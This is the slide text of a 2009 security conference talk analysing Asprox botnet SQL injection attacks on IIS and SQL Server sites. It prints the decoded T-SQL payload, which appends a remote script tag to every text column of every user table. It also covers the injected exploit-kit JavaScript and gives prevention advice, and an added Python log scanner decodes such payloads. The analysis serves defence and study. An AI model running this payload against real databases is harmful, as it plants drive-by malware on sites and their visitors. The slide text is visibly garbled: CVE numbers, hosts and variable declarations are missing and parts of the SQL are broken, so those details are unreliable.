Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet
Agenda
1. The Beginning
2. Attack Analysis
3. Malicious Injected JS
4. Threat Evolution
5. Prevention

The Beginning
May 2008: new Asprox botnet variant
* using Google dorks to find SQL servers
* using HTTP GET brute force for SQL injection
=> millions of reported attempts
=> many successfully compromised targets

Attack Analysis
First attack reported to us: GET
* GET requests can be found in web server logs
* what seems to be an obfuscated SQL injection is appended to the value of the variable 'id'

Attack Analysis
Clean up: NVARCHAR(4000); AS
* the string variable is executed (EXEC function)
* the CAST function is used to obfuscate chars: it converts hexadecimal chars to their ASCII values

Attack Analysis
How to decode 0x C ?
* easy: NULL chars are added between each char
Hex to ASCII gives:
0x44 = D
0x45 = E
0x43 = C
0x4C = L
...

Using Perl Kung-Fu gives the whole code:

    varchar(255)
    DECLARE Table_Cursor CURSOR FOR
      select a.name,b.name from sysobjects a,syscolumns b
      where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(varchar,[ +@C+ ]))+ <script src= com/7.js></script> )
      FETCH NEXT FROM Table_Cursor
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

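The decoding step from the slides above (a hex literal with a NULL char after each character, turned back into readable T-SQL), applied to web server log lines. This is an added Python example, not code from the presentation (which mentions Perl); the log layout, the @S variable name, the marker list and the encoded statement are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request line of a common-log-format entry (log layout is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# CAST(0x<hex> AS NVARCHAR(n)) or VARCHAR(n): the obfuscation the slides describe.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
# Tokens worth surfacing to an analyst once the payload is readable (assumed list).
MARKERS = ("EXEC", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE", "<SCRIPT", "<IFRAME")


def fully_unquote(value, max_passes=3):
    """Undo URL encoding, including double encoding, with a bounded number of passes."""
    for _ in range(max_passes):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_cast_hex(hex_digits, wide):
    """Turn the hex literal back into text.

    wide=True is the NVARCHAR case: UTF-16LE, i.e. a NULL byte after each
    ASCII character (0x4400 = D). wide=False is plain VARCHAR, one byte per char.
    """
    if len(hex_digits) % 2:          # log line truncated mid-byte
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if wide:
        raw = raw[: len(raw) - len(raw) % 2]   # drop a dangling half code unit
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def scan_line(line):
    """Return one finding per CAST(0x...) payload in the line's query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    _, _, query = match.group(1).partition("?")
    findings = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        for cast in CAST_RE.finditer(fully_unquote(value)):
            sql = decode_cast_hex(cast.group(1), wide=bool(cast.group(2)))
            findings.append({
                "param": name,
                "sql": sql,
                "markers": [m for m in MARKERS if m in sql.upper()],
            })
    return findings


def scan_log(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = scan_line(line)
        if found:
            hits[number] = found
    return hits


# Constructed sample: a harmless statement, encoded the way the slides describe.
SAMPLE_SQL = "SELECT name FROM sysobjects -- constructed sample"
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2008:10:01:02 +0000] "GET /news.asp?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/May/2008:10:01:03 +0000] "GET /news.asp?id=42;DECLARE%20@S%20'
    'NVARCHAR(4000);SET%20@S=CAST(0x' + SAMPLE_HEX + '%20AS%20NVARCHAR(4000));EXEC(@S);-- '
    'HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG).items():
        for item in found:
            print(f"line {number}: param={item['param']} markers={item['markers']}")
            print(f"  decoded: {item['sql']}")
```
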
Attack Analysis
Facts:
* the Asprox variant is searching for ASP pages => targeting Microsoft IIS
* the code is written in Transact-SQL => targeting Microsoft SQL Server

Attack Analysis
What does this statement do?

    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

It queries the system tables named 'sysobjects' and 'syscolumns'.

Attack Analysis
sysobjects
  xtype='u' => filters on object type: user table
syscolumns
  xtype=99 or xtype=35 or xtype=231 or xtype=167 => filters on physical storage type: 35 (text), 99 (ntext), 167 (varchar), 231 (nvarchar)
=> The statement returns all user tables and their columns of a text type.

    varchar(255)
    DECLARE Table_Cursor CURSOR FOR
      select a.name,b.name from sysobjects a,syscolumns b
      where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(varchar,[ +@C+ ]))+ <script src=hxxp:// com/7.js></script> )
      FETCH NEXT FROM Table_Cursor
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

Attack Analysis

    exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(varchar,[ +@C+ ]))+ <script src=hxxp:// )

* exec( ... ): execute statement
* +: string concatenation
* update [ ... ] set [ ... ]=: update statement
* rtrim(convert(varchar, ...)): string conversion
* <script src=hxxp:// : malicious HTML snippet

Malicious Injected JS
Redirects to an all-in-one web exploit toolkit
* > 10 attacks
* ActiveX, Flash, Quicktime, no PDF at that time
* MS06-014, CVE , CVE , CVE , BID:29118, CVE , CVE , CVE , CVE CVE , CVE , MS
Purpose:
* download and execute malicious files on the victim's system

Threat Evolution
* use of search engines to find victims
* more attacks, exploitation campaigns speeding up
* not new: a similar SQL injection trick was used in 2007 but not widely distributed
* T-SQL script evolving: versions using an iframe tag or conditional infection

Prevention
* analyze web code, sanitize user input
* use an IPS to filter incoming HTTP requests containing SQL patterns, or a web application firewall to force filtering

Thanks
